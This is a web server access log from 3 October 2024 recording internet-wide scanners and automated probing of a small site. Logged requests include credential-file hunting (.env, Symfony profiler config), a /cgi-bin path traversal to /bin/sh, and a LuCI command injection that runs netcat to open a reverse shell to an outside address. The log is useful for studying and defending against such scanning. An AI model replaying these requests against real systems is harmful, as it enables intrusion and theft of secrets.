18.175.120.105 - - [03/Oct/2024:04:00:34 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
205.210.31.213 - - [03/Oct/2024:04:02:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.213 - - [03/Oct/2024:04:02:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.156.129.48 - - [03/Oct/2024:04:03:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
18.175.120.105 - - [03/Oct/2024:04:03:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:04:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.218 - - [03/Oct/2024:04:04:31 +0200] "GET /.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (iPad; CPU OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Coast/1.0.2.62956 Mobile/10B329 Safari/7534.48.3"
78.153.140.218 - - [03/Oct/2024:04:04:31 +0200] "GET /laravel/.env HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30"
78.153.140.218 - - [03/Oct/2024:04:04:32 +0200] "GET /demo/.env HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8)"
78.153.140.218 - - [03/Oct/2024:04:04:32 +0200] "GET /web/.env HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone; 176x220)"
78.153.140.218 - - [03/Oct/2024:04:04:33 +0200] "GET /admin/.env HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT5)"
78.153.140.218 - - [03/Oct/2024:04:04:34 +0200] "GET /backend/.env HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G955U Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36"
78.153.140.218 - - [03/Oct/2024:04:04:34 +0200] "GET /app/.env HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.1.13) Gecko/20100914 Firefox/3.6.16"
78.153.140.218 - - [03/Oct/2024:04:04:35 +0200] "GET /api/.env HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36 OPR/21.0.1432.67 (Edition Campaign 38)"
78.153.140.218 - - [03/Oct/2024:04:04:35 +0200] "GET /dev/.env HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
78.153.140.218 - - [03/Oct/2024:04:04:35 +0200] "GET /www/.env HTTP/1.1" 404 325 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E5260b Safari/602.1"
78.153.140.218 - - [03/Oct/2024:04:04:36 +0200] "GET /home/.env HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.153.140.218 - - [03/Oct/2024:04:04:36 +0200] "GET /staging/.env HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) FBSMTWB"
78.153.140.218 - - [03/Oct/2024:04:04:36 +0200] "GET /test/.env HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36"
78.153.140.218 - - [03/Oct/2024:04:04:37 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9.2.19) Gecko/20110707 Firefox/3.6.19"
18.175.120.105 - - [03/Oct/2024:04:05:43 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
18.175.120.105 - - [03/Oct/2024:04:06:14 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
162.142.125.193 - - [03/Oct/2024:04:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.193 - - [03/Oct/2024:04:07:23 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.193 - - [03/Oct/2024:04:07:24 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
154.213.187.244 - - [03/Oct/2024:04:07:42 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
162.142.125.41 - - [03/Oct/2024:04:08:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.41 - - [03/Oct/2024:04:08:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.41 - - [03/Oct/2024:04:08:40 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:08:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:09:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [03/Oct/2024:04:10:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:04:10:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:10:56 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.93.0.253 - - [03/Oct/2024:04:11:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.224.128.59 - - [03/Oct/2024:04:11:58 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:13:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:14:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [03/Oct/2024:04:15:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:16:04 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
45.79.172.21 - - [03/Oct/2024:04:16:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.33.80.243 - - [03/Oct/2024:04:16:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.79 - - [03/Oct/2024:04:19:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:20:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.179 - - [03/Oct/2024:04:20:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:23:53 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
164.90.226.218 - - [03/Oct/2024:04:24:03 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
31.220.1.144 - - [03/Oct/2024:04:24:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(nc+31.220.1.144+4444+-e+%2Fbin%2Fsh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.98.11.79 - - [03/Oct/2024:04:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.128.205 - - [03/Oct/2024:04:26:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:27:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [03/Oct/2024:04:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:28:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [03/Oct/2024:04:28:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:04:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.181.251 - - [03/Oct/2024:04:29:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.94.138.127 - - [03/Oct/2024:04:30:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [03/Oct/2024:04:30:55 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [03/Oct/2024:04:30:56 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
18.175.120.105 - - [03/Oct/2024:04:30:59 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
149.50.103.48 - - [03/Oct/2024:04:31:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:04:33:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:04:33:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:04:33:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:04:33:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.129.46 - - [03/Oct/2024:04:34:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
18.175.120.105 - - [03/Oct/2024:04:34:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
74.84.128.125 - - [03/Oct/2024:04:34:34 +0200] "GET /robots.txt HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)"
149.50.103.48 - - [03/Oct/2024:04:35:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.187.244 - - [03/Oct/2024:04:36:28 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
18.175.120.105 - - [03/Oct/2024:04:37:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
18.175.120.105 - - [03/Oct/2024:04:37:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
208.100.26.247 - - [03/Oct/2024:04:38:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
78.153.140.223 - - [03/Oct/2024:04:41:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
78.153.140.223 - - [03/Oct/2024:04:41:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.223 - - [03/Oct/2024:04:41:07 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad;U;CPU OS 5_1_1 like Mac OS X; zh-cn)AppleWebKit/534.46.0(KHTML, like Gecko)CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3"
78.153.140.223 - - [03/Oct/2024:04:41:07 +0200] "GET /demo/.env HTTP/1.1" 404 314 "-" "msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)"
78.153.140.223 - - [03/Oct/2024:04:41:08 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/533.3"
78.153.140.223 - - [03/Oct/2024:04:41:08 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; PowerPC AmigaOS4; Odyssey Web Browser; rv:1.16) AppleWebKit/535.14 (KHTML, like Gecko) OWB/1.16 Safari/535.14"
78.153.140.223 - - [03/Oct/2024:04:41:08 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1"
78.153.140.223 - - [03/Oct/2024:04:41:08 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; CLP285 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.223 - - [03/Oct/2024:04:41:08 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060309 Linux Mint/5 (Elyssa) Firefox/3.0.11"
78.153.140.223 - - [03/Oct/2024:04:41:09 +0200] "GET /dev/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5"
78.153.140.223 - - [03/Oct/2024:04:41:09 +0200] "GET /www/.env HTTP/1.1" 404 313 "-" "More Firefox 3.0.10 user agents strings -->>"
78.153.140.223 - - [03/Oct/2024:04:41:10 +0200] "GET /home/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 FirePHP/0.2.4"
78.153.140.223 - - [03/Oct/2024:04:41:10 +0200] "GET /staging/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.04 (hardy) Firefox/3.0.4"
78.153.140.223 - - [03/Oct/2024:04:41:10 +0200] "GET /test/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Z851M Build/NMF26V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36"
78.153.140.223 - - [03/Oct/2024:04:41:11 +0200] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.39"
78.153.140.223 - - [03/Oct/2024:04:41:11 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Linux; Android 5.1; X9009 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Mobile Safari/537.36 OPR/37.0.2192.112031"
78.153.140.223 - - [03/Oct/2024:04:41:11 +0200] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; es-es; GT-S5301L Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [03/Oct/2024:04:41:11 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1) (Compatible; ; ; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
78.153.140.223 - - [03/Oct/2024:04:41:12 +0200] "GET /info/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.6 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.6"
78.153.140.223 - - [03/Oct/2024:04:41:12 +0200] "GET /infos/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1"
78.153.140.223 - - [03/Oct/2024:04:41:13 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060419 Firefox/1.5.0.2"
78.153.140.223 - - [03/Oct/2024:04:41:13 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; chromeframe/28.0.1500.44; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; Tablet PC 2.0; MS-RTC EA 2; .NET4.0E; MS-RTC LM 8)"
78.153.140.223 - - [03/Oct/2024:04:41:14 +0200] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"
78.153.140.223 - - [03/Oct/2024:04:41:14 +0200] "GET /config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8b5) Gecko/20051006 Firefox/1.4.1"
78.153.140.223 - - [03/Oct/2024:04:41:14 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.02"
78.153.140.223 - - [03/Oct/2024:04:41:14 +0200] "GET /App/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0"
78.153.140.223 - - [03/Oct/2024:04:41:14 +0200] "GET /APP/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (iPad; CPU OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/8.0.57838 Mobile/12B466 Safari/600.1.4"
78.153.140.223 - - [03/Oct/2024:04:41:15 +0200] "GET /APPS/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36"
78.153.140.223 - - [03/Oct/2024:04:41:15 +0200] "GET /Api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
162.216.150.197 - - [03/Oct/2024:04:43:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
172.104.210.105 - - [03/Oct/2024:04:43:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.105.128.12 - - [03/Oct/2024:04:43:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
173.255.221.189 - - [03/Oct/2024:04:44:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.115.59 - - [03/Oct/2024:04:44:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [03/Oct/2024:04:44:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.105.128.13 - - [03/Oct/2024:04:44:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.105.128.11 - - [03/Oct/2024:04:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:12 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:13 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.245.21.158 - - [03/Oct/2024:04:45:13 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:04:45:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:04:45:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
87.236.176.58 - - [03/Oct/2024:04:46:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
147.185.133.158 - - [03/Oct/2024:04:47:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.33.80.243 - - [03/Oct/2024:04:47:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
205.210.31.81 - - [03/Oct/2024:04:47:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.81 - - [03/Oct/2024:04:47:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [03/Oct/2024:04:48:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
85.96.185.215 - - [03/Oct/2024:04:49:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
178.128.46.51 - - [03/Oct/2024:04:49:47 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
